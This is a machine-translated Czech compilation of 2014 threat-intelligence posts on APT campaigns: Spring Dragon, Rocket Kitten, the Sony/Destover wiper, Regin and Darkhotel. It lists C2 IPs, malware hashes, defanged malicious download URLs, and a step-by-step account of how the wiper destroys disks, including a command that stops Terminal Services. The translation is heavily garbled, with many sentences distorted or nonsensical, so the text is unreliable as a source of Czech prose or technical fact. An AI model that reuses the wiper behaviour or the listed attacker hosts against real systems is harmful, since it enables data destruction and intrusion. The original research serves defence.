Další APT později zneužil přesně tuto stránku dodávat škodlivý VBS (CVE-2014 - 6332), využije v listopadu 2014 s odpornou variantou užitečného zatížení. A že stejná skupina také sloužil škodlivý PDF zneužít (CVE-2010-2883), z tohoto webu v červnu 2012 jako "Zawgyi Unicode Keyboard.pdf". Ještě dříve, než to, že oni spearphished se stejným PDF využít objekt později umístěn na webových stránkách pod různými názvy souborů. V listopadu 2011, oni používají názvy souborů vhodných pro své spearphishing cílů s tím využívat jako "台灣 安 保 協會「 亞太 區域 安全 與 台海 和平 」國際 研討會 邀 請 函 _20110907.pdf" ("Taiwan Sdružení Security International seminář Pozvánka - v Asii -Pacific regionální bezpečnost a mír v Taiwanské úžině ")," china-central_asia.pdf "," vodní sector.pdf ", a různé vládní související návrhy. V tomto případě došlo k neočekávanému překrytí ze dvou APT.

Dalším zajímavým technika, která jsme pozorovali v použití proti vládním cílům byla kampaň, která lákal příjemců na místě přesměrování uživatele na instalační podvodného webu Flash.

Toto místo v pořadí přesměrován uživatele na Flash instalátor svázaný se společným Elise backdoor, případně komunikaci s 210.175.53.24 a jeho obvyklé "GET /14111121/page_321111234.html HTTP / 1.0".

hxxp: //www.bkav2010.net/support/flashplayer/downloads.html → přesměrováni na
hxxp: //96.47.234.246/support/flashplayer/install_flashplayer.exe (Trojan-Dropper.Win32.Agent.ilbq)

I když tento konkrétní herec efektivně využít své téměř opotřebované CVE-2012-0158 exploity v minulosti, Spring Dragon zaměstnává více zapojeni a tvůrčí činnost rušivé stejně.

Rocket Kitten": Je to ještě APT, pokud si můžete koupit z regálu?
28.12.2014 APT

Gadi Evron a Tillmann Werner představil zajímavý případ v 31C3 konferenci v Hamburku včera, že ukazuje, jak komerční software může být použit k zahájení APT útoky stylu. V tomto případě je několik podobných útoků, kde zjistili, proti cílům v Izraeli a západní Evropě. Ve všech případech, útok začal s jednoduchým tabulkového procesoru Excel, který byl zaslán jako příloha [1]. E-mail sám byl krátký a všední, ale použitý falešný a pravděpodobný "Z" záhlaví.

Gadi byl tak laskav, že se s námi podělit některé screenshoty těchto příloh. Všichni jsou velmi věrohodné pro cílové příjemce. Klikněte na obrázek pro zobrazení obrázku v plné velikosti (jsou to obrazy, ne původní soubory Excel)

Ukázky Excel přílohy e-mailů

Každý soubor Excel součástí makra. Zatímco používání Excel maker a jednoduchý e-mailové zprávy zpočátku vypadal jako starý a jednoduchý využívat, backdoor upoutala pozornost Gadi a Tillmann který pomáhal s opačným analýzy. Ukázalo se, sofistikovanější a kradmý poté, co bylo zjištěno ve standardním kyberzločinu.

Makro Excel se skládala ze dvou souborů. Jeden z nich byl kódovaný PE binární, druhý jednoduchý skript VBA dekódovat PE binární, zapsat na disk a spusťte jej. To je místo, kde se věci binární dostal větší zájem. Je prováděna velmi schopný zadní vrátka, v podstatě přes server proxy prostřednictvím systémových volání, umožňují velmi flexibilní přístup k systému, který není omezující útočník souboru předdefinovaných příkazů.

Nakonec se ukázalo, že celý útok byl proveden za použití jádra Impact, draze, ale vysoce sofistikovaný produkt, umožňující "bod a klepněte na tlačítko" útoky na úrovni, která se obvykle používají pro APT útoky [2]. Zejména pokud přisuzovat útoky, jako je to na národních států, nebo naznačuje, že útočník musí být vysoce sofistikované a schopen psát vlastní využije, je nutné vzít v úvahu možnost, že útočník právě opakované využití komerční pentesting software, jako je klíčové Impact, nebo dokonce open source nástroje, které nabízejí podobné funkce. Rozpočet na takový útok je obvykle výrazně nižší než $ 100k koupit požadovaný software, číslo, které je dobře v dosahu i menších národů či skupin organizovaného zločinu. V některých případech může být možné najít pirátské kopie fo požadovaný software. Další výhodou použití komerčního softwaru je možnost požádat o podporu a profesionální služby, které vám pomohou s vaší APT útokem.

Kupodivu, backdoor nebyla uznána anti-virus nástroje, i když jádro Impact je běžně používaný produkt. Dopad Jádro také nedokáže "tag" jakýkoli software s pořadovým číslem zákazníka konkrétní, brání přiřazení v případech, jako je ten výše. Toto sériové číslo by nemělo bránit autorizovaného testu pero, ale pomoc při přiřazování neoprávněné útoky.

Pro více informací, vřele doporučuji, že se budete dívat Gadi a Tillmann [1].

[1] http://streaming.media.ccc.de/relive/6575/ (talk začíná kolem 15 minut do záznamu)
[2] http://www.coresecurity.com/core-security-client-side -exploits

Ukazatele kompromisu:

IP adresy

83.170.33.37
83.170.33.60
83.170.33.80
83.170.43.67
84.11.75.220

MD5 hash
01c9cebbc39e273ac1f5af8b629a7327
08273c8a873c5925ae1563543af3715c
08e424ac42e6efa361eccefdf3c13b21
0b0e2c4789b895e8ac44b6ada284aec1
177ef7faab3688572403730171ffb9c4
266cfe755a0a66776df9fd8cd2fee1f1
271a5f526a638a9ae712e6a5a64f3106
393bd2fd420eecf2d4ca9d61df75ff0c
395461588e273fab5734db56fa18051b
48573a150562c57742230583456b4c02
4bf2218eb068385ca1bfff8d609c0104
50d3f1708293f40a2c0c1f151c2c426f
5a009a0d0c5ecaac1407fb32ee1c8172
5af0cbc18c6f8ed4fd1a3f68961f5452
916be1b609ed3dc80e5039a1d8102e82
c222199c9a7eb0d162d5e96955739447
d0c3f4c9896d41a7c42737134ffb4c2e
da976a502a3afc4ba63611d47c625738
ee41e7c97f417b07177ea420afe510a1
f68a0a3784a7edfc60ad9333ec209cbf
f8547010eb4238f8fb76f4e8a756e36d
f89a4d4ae5cca6d69a5256c96111e707

Sony / Destover: Mystery North Korean Herec destruktivní a Past síťovou aktivitu
6.12.2014 APT

APT FBI MALWARE SHAMOON SONY WIPER
Tento týden, poprvé, FBI vydala Flash varování o jeho destruktivní činnost stěrače, který se používá při útoku na Sony Pictures Entertainment. Vzorky tohoto Destover malwaru obsahoval konfigurační soubory vytvořené v systémech využívajících korejské jazykové balíčky.

Od útoku, další informace o malware se vynořil v té či oné podobě, ale některé detaily, jako jsou ty, které se týkají předchozí činnosti z hlavních podezřelých, je ještě třeba přezkoumat.

Takže, zatímco Sony Pictures tiše dokončí své nákladné sanace úsilí a připravuje k vydání "Rozhovor", pojďme diskutovat o některé funkce malwaru, upřeně podobnosti s jinými událostmi stěračů, a někteří z podezřelého skupiny předchozí činnosti.

Mystery_1

První věc, kterou si uvědomit, je, že destruktivní činnost zaměřuje sítí velkých organizací je jasně stává samozřejmostí. Předchozí hlavní malware stěrač je diskutována zde . Pro tyto většina souvisejících událostí došlo na Blízkém východě a na Korejském poloostrově. Dále poznamenal, samostatnou východní Evropy BE2 ICS prostředí v souvislosti s stírací akci, na které se vztahuje podrobněji zde . A to je těžké ignorovat kompletní údaje o zákaznících otřete o Code prostory ve Velké Británii cybercriminal drží je jako rukojmí, jak je uvedeno zde .

Malware zapojený do útoku Sony Entertainment se jmenuje Trojan Destover a je schopen utírání disků a MBR.

Destover Wiper funkce

Mezi nejzajímavější aspekty destruktivní funkčnosti malware se vztahují k výběru a skladování / dodání ovladačů, které jsou nyní opakovaně použity v těchto druzích sabotáže útoků.

V Destover kapátka instalaci a spuštění ovladače EldoS RawDisk obejít bezpečnostní oprávnění NTFS a přepsat data na disku a sám MBR. K dispozici jsou důsledky pro obnovu dat v této. V případě DarkSeoul škodlivého softwaru , přepisování dat může být vytvořena za použití postupu podobného k obnovení této Shamoon "zničených" údajů. Destover obnovu dat je pravděpodobné, že bude stejný.

Řetěz zprostředkujících prvků vedoucích k destruktivní užitečného zatížení takto více fází (které byly již dříve popsány jinde), s možností nastavené spouštění v několika režimech, stejně jako Shamoon :

Vzorek je provozována na 32-bit OS poprvé.
Vzorek je provozována na 32-bit OS jako osoba samostatně výdělečně nainstalovány služby, s jedním z několika cest kódu.
Vzorek je provozován na 64-bit OS jako osoba samostatně výdělečně instalované služby.
Na prvním spuštění, vytvoří "Zálohování a obnovení řízení" službu brmgmtsvc Windows, přidává vlastní spustitelný a nastaví spuštění " -i "spínače. To také kapky několik kopií sebe sama a začne každý z nich s jiným přepínačem: -m, -d, a -W .

-m (MBR přepsání) :
To se pokusí spojit se třemi IP adresy. I když je to neúspěšné, poprava proces probíhá,
se stáhne svůj zdroj, který obsahuje komprimovaný řidiče EldoS RawDisk, a zapíše jej do dočasného adresáře jako "usbdrv3.sys".
Poté nainstaluje ovladač jako usbdrv3 služby "USB 3.0 Host Controller ".
Poté se spustí službu řidiče a zavře svých služeb rukojeti.
To pak vytváří filehandle řidiči s write píše, že rukojeť s 64k řetězce "0xAAAAAAAA". ← na vědomí, že otázka na dlouhé licenčního klíče (# 99E2428 ...), je popsána v našem Shamoon stěrač - část II . BLOGPOST se pak vytvoří nová témata, z nichž každý se pokusí připojit k jakékoliv možné fyzické písmeno jednotky a přepsat stejně ,

-d (přepisovacího) :
To se pokusí o připojení se stejnými třemi IP adresy. Opět platí, že poprava proces probíhá bez ohledu na komunikaci.
To dostane logické jednotky a prochází rekurzivně přes ně, identifikovat všechny datové soubory. Pokud není EXE nebo DLL, proces přepíše obsah souboru s "0x0df0adba 'v 20k kus. Tento přepsat je dokončena z uživatelského režimu, aniž by řidiči EldoS.
Poté se pokusí smazat soubor dat pomocí Win32 API "DeleteFileW". Jak to recurses do všech adresářů systému, pokusí odstranit EXE a DLL soubory.

-w (web server) :
Tento pokusí spojit se stejnými třemi IP adresy. Opět platí, že poprava proces probíhá bez ohledu na komunikaci.
Zastavuje Windows Terminal Services z cmd řádku: "cmd.exe / c net stop TermService / y"
Pak najde zdrojů # 85, rozbalí a zapíše obsah ven do " C: \ WINDOWS \ iissvr.exe ".
Přináší novou iissvr.exe proces a východy.
iissvr je to, co se zdá být - webový server, který udržuje kódovaný JPG, HTML a WAV souborů. To naslouchá na portu 80 a slouží tyto soubory. Plné grafické a rolování zelený varování lze nalézt dále v článku. Dekódovaná jpg zde:

Mystery_2

Konečně, po dvě hodiny spánku, původní služba restartuje počítač s voláním ExitWindowsEx (EWX_REBOOT | EWX_FORCE, 0). To nutí k výjezdu, ale zpožďuje odstávky sám, zatímco vytvoření stavu systému souborů dojde.

Podobnosti Across stěrače

Stejně jako Shamoon, řidiči Destover stěrač, jsou běžně dostupné soubory ovladače EldoS RawDisk.

Stejně jako Shamoon, ovladače Destover stěračů udržovány v sekci zdrojů kapátka.

Stejně jako Shamoon, akce DarkSeoul stěrač hotelu vágní, kódované pseudo-politické zprávy používané přepsat data na disku a hlavní spouštěcí záznam (MBR).

Stejně jako DarkSeoul, spustitelné Destover stěrač byly sestaveny někde mezi 48 hodin před útokem a skutečným dnem útoku. Je vysoce nepravděpodobné, že by útočníci kopí phishingu svou cestu do velkého počtu uživatelů, a vysoce pravděpodobné, že získali neomezený přístup k celé síti před útokem.

Složky Shamoon byly shrnuty v podobně těsném časovém před jejich nasazením. CompiledOn časová razítka všechny spadají do pěti dnů od detonace svých spustitelných souborů. Téměř všechny byly sestaveny na 10.08.2012 (0:17:23 až 2:46:22) a nastavte odpálit na VIII 15, 2012. To je těsný okno tiše nasadit tyto binární soubory s ohledem na skutečnost, že desítky tisíc strojů bylo zničeno s tímto užitečným zatížením.

Ve všech třech případech: Shamoon, DarkSeoul a Destover, skupiny prohlašovat ocenění za jejich destruktivní dopad v rámci celé velké sítě neměl žádnou historii ani skutečnou identitu jejich vlastní. Všichni se pokusil zmizet po jejich činu, nedělal jasné prohlášení, ale přece dělal bizarní a kruhový objezd obvinění z trestné činnosti, a okamžitě podnítil jejich destruktivní akty po politicky nabité případě, že by byla navržena jak mít been v jádru věci.

Obrázky z DarkSeoul "Whois" a skupin Destover "GOP" hotelu "hacknutý" tvrzení, doprovázen "varování" a hrozby, pokud jde o odcizených dat. Oba vyhrožoval, že to byl jen začátek a že skupina bude zpátky. Zdá se, že původní kosterní umělecká díla byla také zahrnuta do obou.

Whois týmu grafika a varování:

Mystery_3

GOP týmu grafika a varování:

Mystery_4

Rozdíly mezi útoky Destover a DarkSeoul stěrač patří Destover je nedostatek * nix skriptů vymazat oddíly přes Linux.

Výše uvedený seznam podobností není, samozřejmě, dokazují, že posádka za Shamoon je stejný jako posádka za jak DarkSeoul i Destover. Ale je třeba poznamenat, že reakční události a provozní a Toolset charakteristiky těchto skupin všechny nesou výrazné podobnosti. A to je zvláštní, že tyto neobvyklé a soustředěné činy rozsáhlými počítačovými ničení jsou prováděny s jasně rozpoznatelnými podobností.

Network činnost

Související maják cíle byly publikovány jako:

88.53.215.64
217.96.33.164
203.131.222.102
Nicméně, přímo související vzorky provést zpětná volání řadu dalších IP adres také. Kaspersky Security Network (KSN) údaje představuje naprostý nedostatek malware se podává z některého z těchto adres v minulosti:

58.185.154.99
200.87.126.116
208.105.226.235
212.31.102.100
Spojení se objeví svévolné a bezvýznamný na provedení škodlivého obalu. Některé z nich jsou v současné době aktivní. Všechny tyto IP adresy se zdají být zvláštně vybrána.

Některé z těchto adres je známo, že provedl RDP Prověřování v nedávné minulosti. Na konci roku 2012, 217.96.33.164 byl známý RDP hovado nutit síťového skeneru. Server je umístěn na IP adresu v Polsku, vedeného u tohoto poskytovatele od roku 1996.

Na začátku roku 2014, 88.53.215.64 hostila v Itálii a sloužil jako "Hide My Ass", prémie a volný proxy server na portu 443. Malware pokusy o připojení k tomuto serveru, na portech 8000 a 8080, a v současné době žádné prostředky jsou k dispozici.

200.87.126.116 také dříve působil jako volný Socks Proxy v letech 2011 a 2012. Často jsou tyto druhy zdrojů, byly zneužity spammery a blackhat SEO podvodníky.

Předchozí Backdoors

V DarkSeoul kampaně, které byly spojeny s několika rodin trojské koně a zadní vrátka, všechny použité v průběhu několika let. Některé odkazy jsou mnohem silnější než ostatní:

Utajování Troy
DarkSeoul
HttpDr0pper
HttpTroy
TDrop
Destover MD5s

Trojské koně:

MD5 Velikost CompiledOn Název Kaspersky
d1c27ee7ce18675974edf42d4eea25c6 262 KB 2014.11.22 00:06:54 Trojan.Win32.Destover.a
2618dd3e5c59ca851f03df12c0cab3b8 430KB 2014.11.22 00:05:02 Trojan.Win32.Destover.d
760c35a80d758f032d02cf4db12d3e55 244KB 2014.11.22 04:11:08 Trojan.Win32.Destover.c
b80aa583591eaf758fd95ab4ea7afe39 304KB 2014.11.24 04:12:55 Trojan.Win32.Destover.b
e1864a55d5ccb76af4bf7a0ae16279ba 112KB 2014.11.13 02:05:35 Backdoor.Win32.DestoverServ.a
a3fa8c7eb4f061ab8b9f7829c6741593 111KB 05.03.2014 07:10:22 Trojan.Win32.Destover.f
2c545b89acdb9877da5cbb96653b1491 53kb 2014.07.14 13:38:18 Trojan.Win32.Destover.e
Eldos Ovladače:

6aeac618e29980b69721158044c2e544 (32-bit), podepsané EldoS Corporation 86e212b7fc20fc406c692400294073ff (64-bit), podepsané EldoS Corporation

Certifikát ( 6aeac618e29980b69721158044c2e544 32-bit a 86e212b7fc20fc406c692400294073ff 64-bit):
Data:
Version: 3 (0x2)
Serial Number:
01:00:00:00:00:01:10:0c:98:3a:31
Signature Algorithm: sha1WithRSAEncryption
Issuer: C=BE, O=GlobalSign nv-sa, OU=ObjectSign CA, CN=GlobalSign ObjectSign CA
Validity
Not Before: Jan 10 15:20:07 2007 GMT
Not After : Jan 10 15:20:07 2010 GMT
Subject: C=VG, O=EldoS Corporation, CN=EldoS Corporation/emailAddress=info@eldos.com
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
Public-Key: (1024 bit)
Modulus:
00:d7:60:2f:bf:3c:85:1b:f3:a1:19:8c:4d:0e:49:
c5:a5:f5:16:15:b6:ea:91:e2:c2:92:7b:d6:e5:2a:
1e:68:8c:7b:28:eb:07:dc:b0:3a:dd:11:ee:84:a9:
8b:6f:04:b0:ae:c2:2d:bc:b7:56:41:61:e1:ae:01:
0d:0e:83:47:00:3a:ca:b5:12:fb:e5:b6:55:ac:e0:
94:00:5b:e0:61:70:24:ba:d9:ef:4a:e2:af:8f:21:
93:9e:8b:83:17:2a:e4:3d:74:e6:07:c8:4a:69:ed:
60:9b:89:6e:5b:85:50:49:52:f9:fa:91:63:9f:61:
a7:ea:e2:3e:d7:1b:07:22:a1
Exponent: 65537 (0x10001)
X509v3 extensions:
Netscape Cert Type:
Object Signing
X509v3 Key Usage: critical
Digital Signature, Non Repudiation, Key Encipherment, Data Encipherment
X509v3 Authority Key Identifier:
keyid:D2:5B:F3:4B:26:4B:A5:B0:E7:5D:FD:56:7F:F6:F1:2E:38:4E:53:A0
X509v3 CRL Distribution Points:
Full Name:
URI:http://crl.globalsign.net/ObjectSign.crl
Signature Algorithm: sha1WithRSAEncryption
44:0d:5b:2c:f4:c3:c0:91:c0:9f:4d:91:f0:25:5c:79:72:ff:
82:7a:a8:97:fb:08:2b:c2:eb:ae:4b:78:b6:a8:0f:5b:3a:1d:
12:c9:07:81:d0:16:e0:94:1e:69:3c:43:c1:d8:85:b1:4c:1a:
21:84:1c:c8:ed:0a:7e:e4:55:b7:f8:ae:69:a8:b0:8c:10:da:
6e:57:f4:a3:62:5b:2b:4f:06:25:a9:35:f0:63:cc:3f:e0:f6:
4c:ee:1d:d8:9f:d8:ae:d3:fe:de:3b:0b:c5:f3:19:1c:2a:37:
ad:0d:5c:87:5e:da:8f:31:02:d3:78:5d:f1:30:28:78:c3:86:
f7:b2:f6:6c:2d:d8:45:8a:8b:16:eb:bb:d0:6e:5b:98:68:8e:
9b:cc:7e:77:9d:0d:b3:5f:01:d8:57:26:6d:cf:85:2a:46:52:
0f:79:93:85:f7:19:14:01:73:d5:03:e7:96:1a:16:cd:24:0b:
67:6d:f9:72:55:b8:b9:e9:be:07:58:b3:01:bd:a1:18:57:bb:
b3:19:e5:88:0e:f5:96:fe:eb:b8:66:a6:c6:2c:62:b5:21:59:
f2:d9:4d:2b:d1:59:20:07:13:78:26:dc:d5:b3:d1:55:47:5e:
2e:cb:cb:cc:04:7c:d5:e2:9d:7c:24:b1:18:70:da:1f:54:5b:
59:88:d1:17

The Art of Nalezení Cyber-koster dinosaurů

6.12.2014 APT

Po vydání naší zprávy o Regin národní stát kybernetické operace , otázky byly vzneseny , zda anti-malware společnosti vědomě zadržena informace - a detekce - na žádost vlád a zákazníků. Podobná otázka byla vznesena Bruce Schneier v roce 2013.

Pojďme si na nejdůležitější otázku z cesty okamžitě. Nikdy jsme byli požádáni zákazníkem nebo vládní entity whitelist nebo zastavit odhalení žádné konkrétní malware vzorek. Nikdy jsme v souladu s takovou žádostí, bez ohledu na zdroj.

To prostě nestane. V některých případech, vyšetřování pokročilé cílené útoky jsou NDAS (dohody o utajení), se zákazníky a jsme povinni zachovávat mlčenlivost, ale že nikdy ovlivňuje přidání detekci a chránit celou naši zákaznickou základnu před hrozbami.

Takže, proč to trvalo dva roky, abychom se vydat zprávu o Regin? Bez správného kontextu, může se zdát, že výzkumní pracovníci stále něco opravdu důležitého ve tmě za nepřiměřeně dlouhou dobu. Nicméně, výzkum v oblasti bezpečnosti - ne nepodobná vyšetřování činné v trestním řízení - vyžaduje pečlivou kontrolu a analýzu a v mnoha případech je důležité se dívat na trestný čin rozvinout v reálném čase na vybudování správné věci.

V našem případě, aniž by neomezenými zdroji a ke skutečnosti, že Sledujeme několik APT herce najednou ( Careto / Mask , EpicTurla , Darkhotel , Miniduke / Cosmicduke , abychom jmenovali alespoň některé), to bude proces, který trvá měsíce i roky, na získat celkový přehled o kybernetické operace.

Sean Sullivan z F-Secure za předpokladu, perfektní popis APT výzkumu, přirovnal ji k práci paleontologů, které najdou některé kosti dinosaura. Každý může mít kost, ale nikdo nemá úplnou kostru.

V případě, že Regin, co jsme se poprvé objevili v roce 2012 byl lehce poškozen kost od neznámého části monstrum žijící v tajemné horské jezero.

sandbon [2]

(Se svolením southampton.ac.uk)

Někdo najít kost ji může zrušit a ponechat na cestách, ale výzkum v oblasti bezpečnosti sbíráme věci. Původní objev šel do naší sbírky věcí uložených ve dvoře. Máme mnoho z těchto zlomenin z neviditelných příšer a možná neškodné tvory. Občas slyšíme o dalších kostních fragmentů byl objeven ostatními, a to nás tlačí, aby se blíže podívat, ale v počátečních fázích, bez dostatečné důkazy, vyvodit závěry, že nemá smysl jít veřejnost o objevech, dokud potvrdit, že monstra jsou skutečné, velké a nebezpečné.

Sunday Express Headline 160.751 Přiblížit

Máme pokračovat v práci v různých kanálech sbírat různé artefakty, které mohou, ale nemusí odpovídající některé z kusů v naší sbírce. Někdy jsme spojit síly s ostatními "paleontology" a sdílet své objevy. Poté, co jsme se shromáždit dostatek kostí z monstra pochopit potenciální velikost, nebezpečí a možná stanoviště, můžeme začít další fáze, která je skutečná aktivní vyšetřování, které by nás mohly vést k tajemné horské jezero.

Komplexní APT výzkumný projekt se skládá z několika fází:

Přidání detekce pro známé moduly
Sběr vzorků
Couvání vzorků
Dešifrování sofistikované šifrování a kompresi schémata
Pochopení boční pohyb
Osnova více etap útok ve správném pořadí
Mapování C & C infrastruktura
Nastavení závrty
Analýza shromážděné dopravní a komunikační protokoly
Procházení další počítače, které chápou stejného protokolu
Užívání dolů a získávání představy o C & C servery
Identifikace obětí, rozesílání oznámení obětem a globální skupiny CERT
Použití soudní analýzu a extrahování protokoly, ukradené soubory, ostatní komponenty
Sběr a analýza dat z KSN, C & C servery, jednotlivé oběti, kteří jsou ochotni s námi spolupracovat, závrty, crawlers, atd.
Psaní komplexní zprávu
Pokud budeme mít štěstí, můžeme najít monstrum in-the-Wild, která je nejlepším zdrojem pro vědecké studie. Ve většině případů, včetně Regin, pozorujeme a učit se od chování živé monstrum. Natáčíme na každém kroku, stejně jako úmysl.

Současně, můžeme vzít dolů a studovat v laboratoři jako zoologů. Nicméně, v mnoha výzkumných šetření, můžeme vidět jen kostru monstrum. Musíme dát všechno dohromady a rekonstruovat, jak monstrum přestěhoval, co to bylo zvyky, jaké druhy to napadli, a jak byly tyto útoky koordinovány. Jednoduše řečeno, to vyžaduje čas a trpělivost.

Kromě toho, když budeme analyzovat vlastnosti určitého tvora, chápeme, že vývoj jde dál a tam jsou jiné druhy, jako je předmět, žít a kopat někde v takovým způsobem, že to není vidět vůbec.

Zatímco některé z těchto vzorků Regin se dostal na našem radaru brzy a my pokračovali najít další vzorky a artefakty v průběhu výzkumu, jsme přesvědčeni o tom, že jsou jiné, které jsou v současné době neznámé a neobjevené. Málo se ví o jejich životě a existenci v minulosti, ale my víme, že byli tam tím, že najde nějaké drobné úlomky v průběhu času. A musíme odkazovat na paleontologii znovu, protože v celkovém hodnocení jsme objevili jen malou část celého šelmy, ale mají dost uvolnit veřejné upozornění.

DINO_Regin

Stejně jako Regin, někdy zjistíme, že jsme byli odhalování kusů malwaru na několik let, než si uvědomil, že to byla součást globální kybernetické špionáže kampaně. Dobrým příkladem je příběh RedOctober . Byli jsme detekci komponent RedOctober dávno předtím, než jsme zjistili, že to byl použit v cílených útoků proti diplomatické, vládní a vědecko-výzkumných organizací.

V Kaspersky Lab, zpracováváme stovky tisíc vzorků každý den. Umění přijít na to, které z nich jsou významné a přesto dále ty, které patří k sobě jako součást velké APT útoku je podobný hledání jehly v kupce sena obrovské a pak přijít na to, které z nich patří do stejné pletení sady. Jsme vděčni za každou jehlu zjistíme, protože to dělá svět trochu bezpečnější.

Bojíte se skrytých ataků hackerů? Tady jsou tipy, jak na ně

24.11.2014 APT
Experti tvrdí, že ke zmaření útoků APT (Advanced Persistent Threat, tedy pokročilý, cílený a dlouhodobě přetrvávající útok) jsou nutné čas, školení a spolupráce. Přinášíme osvědčené postupy, které vám pomohou udržet si silnou obranu své firemní infrastruktury před nezvanými hosty.

Úspěch dosavadních ataků APT je údajně tak obrovský, že se odhalování těchto narušení a boj proti nim mohou zdát při jakékoliv vytrvalosti jako beznadějné.

Podle různých novinových zpráv a několika prohlášení expertů se hackeři z Číny prolamují do různých organizací – počínaje významnými vydavateli novin po dodavatele vojenského materiálu či špičkových technologií.

Zůstávají přitom neodhalení dostatečně dlouhou dobu, aby způsobili škody v řádu miliard dolarů, co se týče například oblasti duševního vlastnictví či návrhů důmyslných zbraní.

Odborníci na bezpečnost nazývají útoky APT bezpečnostní výzvou moderní éry. Kybernetické útoky jsou podle nich jedněmi z tichých, smrtících a zákeřně neznámých hrozeb, které nejsou vidět.

Útoky APT přitom už nejsou jen doménou států s obrovskými zdroji a nezaměřují se jen na špionáž či útoky proti armádám nebo jiným vládním subjektům. Existují v sítích podniků působících v IT, energetice, zpravodajství, telekomunikacích, výrobě a dalších sektorech ekonomiky.

Řada bezpečnostních expertů je přesvědčena, že i když zřejmě nikdy nebude možné zcela je eliminovat, útoky APT lze zjistit a minimalizovat jimi způsobované škody.

„Existují řešení, takže se svět v tomto směru nehroutí,“ tvrdí Wade Williamson, bezpečnostní analytik ve společnosti Palo Alto Networks. „Lidé z oblasti zabezpečení často využívají útoky APT jako omluvu pro selhání, ale tak by to být nemělo. Existují technologie, které mohou pomoci.“

Williamson je mezi těmi, kteří také tvrdí, že efektivní detekce a obrana proti útokům APT vyžaduje více než jen nové technologie. Obecně podle něj platí, že „největší potřebná změna se netýká některé z taktik, ale samotné strategie. Bezpečnost se musí vyvinout ve velmi kreativní disciplínu.“

Historicky se bezpečnostní přístup uskutečňoval formou zamítání a blokování 100 % hrozeb. Ani jedno z těchto pravidel ale dnes už není praktické.

Potřebujeme, aby bezpečnostní profesionálové byli zvídaví – aby hledali věci, které nedávají úplně smysl, a ptali se sami sebe, co by to mohlo znamenat a jak by mohli problém prozkoumat podrobněji.

„Vždycky budete potřebovat automatické zabezpečení, které blokuje špatné věci,“ tvrdí Williamson, „ale potřebujeme i kreativní experty hledající angažované darebáky na druhé straně.“
Zaujal vás tento článek? Přehled nejzajímavějších zpráv získáte odebíráním našeho newsletteru »

To všechno znamená, že existuje celá řada postupů, které bezpečnostní experti doporučují dělat organizacím, jež berou bitvu s hrozbami útoků APT vážně. Uvádíme je níže bez stanovení jakéhokoli pořadí.

1. Použití big dat pro analýzy a detekci

Rada, kterou dal výkonný předseda RSA Art Coviello během svého proslovu na loňské konferenci RSA, zní: „Celá podstata boje proti APT opouští režim prevence – big data vám umožní detekci a rychlejší reakci.“

Tuto myšlenku podporují lidé, jako je třeba Aviv Raff, spoluzakladatel a technologický ředitel společnosti Seculert. Podle něj je není prevence na hranici sítě možná, takže se detekce musí „založit na schopnosti rozboru dat, jež je nutné nepřetržitě shromažďovat a analyzovat. A zde vstupuje na scénu analytika spojená s big daty.“

Samozřejmě že to od organizací představuje počáteční investice do analytických nástrojů. „Současná IT oddělení nemají automatizované nástroje potřebné pro včasnou identifikaci infekce,“ tvrdí Brian Foster, technologický ředitel společnosti Damballa, a dodává: „Namísto toho mají obrovská kvanta údajů. Dodavatelé musejí poskytnout přístupy využívající big data pro detekci infekcí.“

Williamson s tím částečně souhlasí a považuje big data za užitečnou technologii při detekci. Podotýká však: „Nejdůležitější pointou je, že samotné útoky bývají rozložené do více kroků a technologií, takže se náš pohled na bezpečnost musí vymanit ze svého omezeného přístupu a být stejně tak komplexní, jako jsou samotné APT.“

2. Sdílení informací se správnými lidmi

Anton Chuvakin vloni na blogu Gartneru napsal, že zločinci sdílejí data, triky a metody mnohem lépe než obránci. „Považuje se za přijatelné tajit své těžce získané znalosti o způsobech používaných ke zjišťování příslovečných pokročilých útočníků, a to i v případě, kdy vaši kolegové v jiných organizacích bojují se stejnou hrozbou. A cyklus utrpení pokračuje!“ tvrdí Chuvakin.

Kompletní článek zahrnující řadu dalších poznatků a zajímavostí si můžete přečíst v Computerworldu 10/2014.

Darkhotel APT

11.11.2014 APT

Darkhotel APT - Kaspersky Lab Research
Technická příloha

Stejně jako se přikrčil Yeti , Darkhotel APT je neobvykle kalná, dlouhodobě fungující a dobře finančně herec hrozba vykazuje podivnou kombinaci vlastností.

Toto APT přesně řídí své kampaně pomocí kopí-phishing cílů s velmi pokročilými Flash zero-day exploity, které účinně obcházet nejnovější obrany Windows a Adobe, a přesto také nepřesně šíří mezi velký počet nejasných cílů s peer-to-peer šíření taktiky. Navíc, většina charakteristickým znakem této posádky je, že po dobu několika let Darkhotel APT udržuje schopnost využívat hotelové sítě k následování a hit vybraného cíle, zatímco oni cestují po celém světě. Tyto cestující jsou často špičkoví manažeři z různých oborů podnikání a outsourcing v asijsko-tichomořské oblasti. Cíle zahrnovaly ředitelé, vedoucí viceprezidenty, prodejní a marketingové ředitele a vrchní zaměstnanců VaV. Tento hotel Network Intrusion sada poskytuje útočníkům s přesným celosvětový přístup měřítku k cílům s vysokou hodnotou. Z našich pozorování, což je nejvyšší objem útočné činnosti na hotelových řetězců začala v srpnu 2010 a pokračoval do roku 2013, a my se vyšetřuje některé 2014 hotel událostí v síti.

Kromě znečišťující P2P sítě nakazit masy, ale vzít legitimitu certifikační orgány, aby dále jejich útoky. Zneužily slabě implementována digitální certifikáty k podpisu jejich malcode. Herec zneužil důvěry nejméně deset autorit tímto způsobem. V současné době jsou krádeže a re-používat jiné oprávněné osvědčení podepsat jejich většinou statické backdoor a infostealer sadu nástrojů. Jejich infrastruktura roste a zmenšuje v průběhu času, s nejednotným klinickým obrazem na nastavení. Je tak chráněna flexibilní šifrování dat a špatně bránil se slabou funkcí.

Kategorie oběti, patří tyto vertikály:

Výroba velmi velké elektronika
Investiční kapitál a private equity
Pharmaceuticals
Kosmetika a chemikálie pro výrobu offshoring a prodej
Automobilový výrobce offshoring služeb
Automobilové montáž, distribuce, prodeje a služeb
Průmyslovou základnu obrany
Vymáhání práva a vojenské služby
Nevládní organizace
